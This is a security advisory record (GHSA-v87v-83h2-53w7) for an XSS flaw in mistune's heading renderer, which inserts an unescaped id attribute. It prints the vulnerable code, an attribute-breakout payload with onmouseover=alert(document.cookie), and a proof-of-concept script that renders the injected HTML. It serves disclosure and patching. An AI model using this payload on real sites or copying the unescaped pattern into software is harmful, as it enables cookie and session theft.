GHSA-V87V-83H2-53W7
Vulnerability from github – Published: 2026-05-09 00:13 – Updated: 2026-05-09 00:13Summary
HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.
The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like #installation or #getting-started — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.
Details
File: src/mistune/renderers/html.py
def heading(self, text: str, level: int, **attrs: Any) -> str:
tag = "h" + str(level)
html = "<" + tag
_id = attrs.get("id")
if _id:
html += ' id="' + _id + '"' # ← _id is never escaped
return html + ">" + text + "</" + tag + ">\n"
The text body (line content) is escaped upstream by the inline token renderer, which is why text arrives as " etc. But _id arrives as a raw string directly from whatever the heading_id callback returned — no escaping occurs at any point in the pipeline.
PoC
Step 1 — Establish the baseline (safe default IDs)
The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, …
bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)
Output — ID is auto-generated, no user text appears in it:
<h2 id="toc_1">Introduction</h2>
Step 2 — Add the realistic trigger: a text-based heading_id callback
Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:
def raw_id(token, index):
return token.get("text", "") # returns raw heading text as the ID
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
Step 3 — Craft the exploit payload
Construct a heading whose text contains a double-quote followed by an injected attribute:
## foo" onmouseover="alert(document.cookie)" x="
When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.
Step 4 — Observe attribute breakout in the output
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)
Actual output:
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo" onmouseover="alert(document.cookie)" x="</h2>
Note: the heading body text is correctly escaped ("), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.
Script
A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook
def raw_id(token, index):
return token.get("text", "")
# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)
bl_file = "baseline_h2.md"
bl_src = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)
print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)
# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
ex_file = "exploit_h2.md"
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)
print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)
# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""
def case(kind, label, filename, src, out):
return f"""
<div class="case {kind}">
<div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
<div class="panels">
<div class="panel">
<h3>Input — {h.escape(filename)}</h3>
<pre>{h.escape(src)}</pre>
</div>
<div class="panel">
<h3>Output — HTML source</h3>
<pre>{h.escape(out)}</pre>
<div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
<div class="rendered">{out}</div>
</div>
</div>
</div>"""
page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""
out_path = os.path.join(os.getcwd(), "report_h2.html")
with open(out_path, "w") as f:
f.write(page)
print(f"\n[report] {out_path}")
Example Usage:
python poc.py
Once the script is run, open report_h2.html in the browser and observe the behaviour.
Impact
| Dimension | Assessment |
|---|---|
| Confidentiality | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |
| Integrity | DOM manipulation, phishing content injection, forced navigation |
| Availability | Page freeze or crash available to attacker |
Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading_id callback without independently sanitising the returned value.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.2.0"
},
"package": {
"ecosystem": "PyPI",
"name": "mistune"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44897"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-09T00:13:12Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n`HTMLRenderer.heading()` builds the opening `\u003chN\u003e` tag by string-concatenating the `id` attribute value directly into the HTML \u2014 with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `\"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element.\n\nThe default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, \u2026) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself \u2014 to produce human-readable slug anchors like `#installation` or `#getting-started` \u2014 is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute.\n\n## Details\n**File:** `src/mistune/renderers/html.py`\n\n```python\ndef heading(self, text: str, level: int, **attrs: Any) -\u003e str:\n tag = \"h\" + str(level)\n html = \"\u003c\" + tag\n _id = attrs.get(\"id\")\n if _id:\n html += \u0027 id=\"\u0027 + _id + \u0027\"\u0027 # \u2190 _id is never escaped\n return html + \"\u003e\" + text + \"\u003c/\" + tag + \"\u003e\\n\"\n```\n\nThe `text` body (line content) *is* escaped upstream by the inline token renderer, which is why `text` arrives as `\u0026quot;` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned \u2014 no escaping occurs at any point in the pipeline.\n\n## PoC\n**Step 1 \u2014 Establish the baseline (safe default IDs)**\n\nThe script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). The default hook generates sequential numeric IDs:\n\n```python\nmd_safe = create_markdown(escape=True)\nadd_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, \u2026\n\nbl_src = \"## Introduction\\n\"\nbl_out, _ = md_safe.parse(bl_src)\n```\n\nOutput \u2014 ID is auto-generated, no user text appears in it:\n```html\n\u003ch2 id=\"toc_1\"\u003eIntroduction\u003c/h2\u003e\n```\n\n**Step 2 \u2014 Add the realistic trigger: a text-based `heading_id` callback**\n\nDeriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version \u2014 return the raw heading text unchanged \u2014 to show the vulnerability without any extra transformation:\n\n```python\ndef raw_id(token, index):\n return token.get(\"text\", \"\") # returns raw heading text as the ID\n\nmd_vuln = create_markdown(escape=True)\nadd_toc_hook(md_vuln, heading_id=raw_id)\n```\n\n**Step 3 \u2014 Craft the exploit payload**\n\nConstruct a heading whose text contains a double-quote followed by an injected attribute:\n\n```\n## foo\" onmouseover=\"alert(document.cookie)\" x=\"\n```\n\nWhen `raw_id` is called, `token[\"text\"]` is `foo\" onmouseover=\"alert(document.cookie)\" x=\"`. This is passed verbatim to `heading()` as the `id` attribute value.\n\n**Step 4 \u2014 Observe attribute breakout in the output**\n\n```python\nex_src = \u0027## foo\" onmouseover=\"alert(document.cookie)\" x=\"\\n\u0027\nex_out, _ = md_vuln.parse(ex_src)\n```\n\nActual output:\n```html\n\u003ch2 id=\"foo\" onmouseover=\"alert(document.cookie)\" x=\"\"\u003efoo\u0026quot; onmouseover=\u0026quot;alert(document.cookie)\u0026quot; x=\u0026quot;\u003c/h2\u003e\n```\n\nNote: the heading **body text** is correctly escaped (`\u0026quot;`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted.\n\n### Script \n\nA verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.\n\n```python\n#!/usr/bin/env python3\n\"\"\"H2: HTMLRenderer.heading() inserts the id= value verbatim \u2014 no escaping.\"\"\"\nimport os, html as h\nfrom mistune import create_markdown\nfrom mistune.toc import add_toc_hook\n\ndef raw_id(token, index):\n return token.get(\"text\", \"\")\n\n# --- baseline ---\nmd_safe = create_markdown(escape=True)\nadd_toc_hook(md_safe)\n\nbl_file = \"baseline_h2.md\"\nbl_src = \"## Introduction\\n\"\nwith open(os.path.join(os.getcwd(), bl_file), \"w\") as f:\n f.write(bl_src)\nbl_out, _ = md_safe.parse(bl_src)\n\nprint(f\"[{bl_file}]\\n{bl_src}\")\nprint(\"[output \u2014 id=toc_1, no user content, safe]\")\nprint(bl_out)\n\n# --- exploit ---\nmd_vuln = create_markdown(escape=True)\nadd_toc_hook(md_vuln, heading_id=raw_id)\n\nex_file = \"exploit_h2.md\"\nex_src = \u0027## foo\" onmouseover=\"alert(document.cookie)\" x=\"\\n\u0027\nwith open(os.path.join(os.getcwd(), ex_file), \"w\") as f:\n f.write(ex_src)\nex_out, _ = md_vuln.parse(ex_src)\n\nprint(f\"[{ex_file}]\\n{ex_src}\")\nprint(\"[output \u2014 heading_id returns raw text, id= not escaped]\")\nprint(ex_out)\n\n# --- HTML report ---\nCSS = \"\"\"\nbody{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}\nh1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}\np.desc{color:#555;font-size:.9em;margin-top:6px}\n.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}\n.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}\n.baseline .case-header{background:#d1fae5;color:#065f46}\n.exploit .case-header{background:#fee2e2;color:#7f1d1d}\n.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}\n.panel{padding:16px}\n.panel+.panel{border-left:1px solid #eee}\n.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}\npre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}\n.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}\n.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}\n\"\"\"\n\ndef case(kind, label, filename, src, out):\n return f\"\"\"\n\u003cdiv class=\"case {kind}\"\u003e\n \u003cdiv class=\"case-header\"\u003e{\u0027BASELINE\u0027 if kind==\u0027baseline\u0027 else \u0027EXPLOIT\u0027} \u2014 {h.escape(label)}\u003c/div\u003e\n \u003cdiv class=\"panels\"\u003e\n \u003cdiv class=\"panel\"\u003e\n \u003ch3\u003eInput \u2014 {h.escape(filename)}\u003c/h3\u003e\n \u003cpre\u003e{h.escape(src)}\u003c/pre\u003e\n \u003c/div\u003e\n \u003cdiv class=\"panel\"\u003e\n \u003ch3\u003eOutput \u2014 HTML source\u003c/h3\u003e\n \u003cpre\u003e{h.escape(out)}\u003c/pre\u003e\n \u003cdiv class=\"rlabel\"\u003e\u2193 rendered in browser (hover the heading to trigger onmouseover)\u003c/div\u003e\n \u003cdiv class=\"rendered\"\u003e{out}\u003c/div\u003e\n \u003c/div\u003e\n \u003c/div\u003e\n\u003c/div\u003e\"\"\"\n\npage = f\"\"\"\u003c!DOCTYPE html\u003e\u003chtml lang=\"en\"\u003e\u003chead\u003e\u003cmeta charset=\"UTF-8\"\u003e\n\u003ctitle\u003eH2 \u2014 Heading ID XSS\u003c/title\u003e\u003cstyle\u003e{CSS}\u003c/style\u003e\u003c/head\u003e\u003cbody\u003e\n\u003ch1\u003eH2 \u2014 Heading ID XSS (unescaped id= attribute)\u003c/h1\u003e\n\u003cp class=\"desc\"\u003eHTMLRenderer.heading() in renderers/html.py does html += \u0027 id=\"\u0027 + _id + \u0027\"\u0027 with no escaping.\nTriggered when heading_id callback returns raw heading text \u2014 the most common doc-generator pattern.\u003c/p\u003e\n{case(\"baseline\", \"Clean heading \u2192 sequential id=toc_1, safe\", bl_file, bl_src, bl_out)}\n{case(\"exploit\", \"Malicious heading \u2192 quotes break out of id=, onmouseover injected\", ex_file, ex_src, ex_out)}\n\u003c/body\u003e\u003c/html\u003e\"\"\"\n\nout_path = os.path.join(os.getcwd(), \"report_h2.html\")\nwith open(out_path, \"w\") as f:\n f.write(page)\nprint(f\"\\n[report] {out_path}\")\n```\n\nExample Usage:\n```bash\npython poc.py\n```\n\nOnce the script is run, open `report_h2.html` in the browser and observe the behaviour.\n\n## Impact\n| Dimension | Assessment |\n|------------------|-----------|\n| **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |\n| **Integrity** | DOM manipulation, phishing content injection, forced navigation |\n| **Availability** | Page freeze or crash available to attacker |\n\n**Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune\u0027s `heading_id` callback without independently sanitising the returned value.",
"id": "GHSA-v87v-83h2-53w7",
"modified": "2026-05-09T00:13:12Z",
"published": "2026-05-09T00:13:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-v87v-83h2-53w7"
},
{
"type": "PACKAGE",
"url": "https://github.com/lepture/mistune"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Mistune Heading ID Attribute has Injection XSS"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.